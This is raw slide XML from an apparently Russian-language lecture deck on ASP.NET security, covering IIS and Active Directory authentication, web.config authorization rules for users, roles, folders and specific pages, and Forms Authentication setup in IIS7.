          <p:cNvPr id="7171" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1417638"/>
            <a:ext cx="8410575" cy="1865312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Users credentials defined in active directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Leverage IIS to perform authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IIS challenges browser by sending a 401 status code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>IIS forwards the username to ASP.NET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1325563" y="4206875"/>
            <a:ext cx="9144000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7173"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93825" y="3298825"/>
            <a:ext cx="6011863" cy="35591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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62467" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;deny users="dan" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;deny users="jenny" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;deny users="matthew" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>	&lt;allow users="*" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>&lt;/authorization&gt;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sz="3600" smtClean="0"/>
              <a:t>Управление доступом к конкретной папке </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>приложения</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63491" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8435975" cy="5068888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Обычным подходом является размещение файлов, которые требуют авторизации в отдельную папку. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>С помощью ASP.NET файлов конфигурации этот подход просто выполняется.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Просто оставьте элемент &lt;authorization&gt; в обычной родительской папке пустым и добавьте файл web.config, который задает строгие установки в папке, которая содержит секретные ресурсы.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Помните, что когда добавляется файл web.config в подпапку, она должна содержать специфические для приложения установки по авторизации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Например, она может содержать только информацию по авторизации, такую как:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>    &lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>        &lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	      &lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>       &lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>   &lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>&lt;/configuration&gt;</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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3600" smtClean="0"/>
              <a:t>Управление доступом к конкретным файлам</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="5068888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;configuration&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>    &lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>        &lt;!-- Other settings omitted. --&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>        &lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>            &lt;allow users="*" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>        &lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>    &lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>    &lt;location path="SecuredPage.aspx"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>         &lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>             &lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>                 &lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>             &lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>         &lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>   &lt;/location&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>   &lt;location path="AnotherSecuredPage.aspx"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>        &lt;system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>            &lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>                  &lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>            &lt;/authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>        &lt;/system.web&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" b="1" smtClean="0"/>
              <a:t>   &lt;/location&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1400" smtClean="0"/>
              <a:t>&lt;/configuration&gt;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sz="3600" smtClean="0"/>
              <a:t>Управление доступа для конкретных ролей</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8435975" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;authorization&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;deny users="?" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>users="dan,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>matthew" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;allow roles="Manager,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Supervisor" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>    &lt;deny users="*" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>&lt;/authorization&gt;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457200" y="2636838"/>
            <a:ext cx="8229600" cy="1439862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Подключение пользователей к </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>приложению</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sz="4000" b="1" smtClean="0"/>
              <a:t>IIS 7.0 и Forms Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>В </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>имеется новая консоль управления.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>С помощью консоли управления </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>можно настраивать параметры </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>web.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t> (а можно и вручную).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Можно сконфигурировать </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>forms authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>с помощью </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>IIS7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Включить режим</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Задать правила аутентификации.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU"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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68611" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="136525" y="1649413"/>
            <a:ext cx="8893175" cy="49784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229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Включение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>form authentication</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="4000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69635" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971550" y="1103313"/>
            <a:ext cx="7343775" cy="5761037"/>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ru-RU" smtClean="0"/>
              <a:t>Запрет анонимного доступа</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70659" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="1484313"/>
            <a:ext cx="7326313" cy="5116512"/>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9750" y="908050"/>
            <a:ext cx="8353425" cy="4032250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
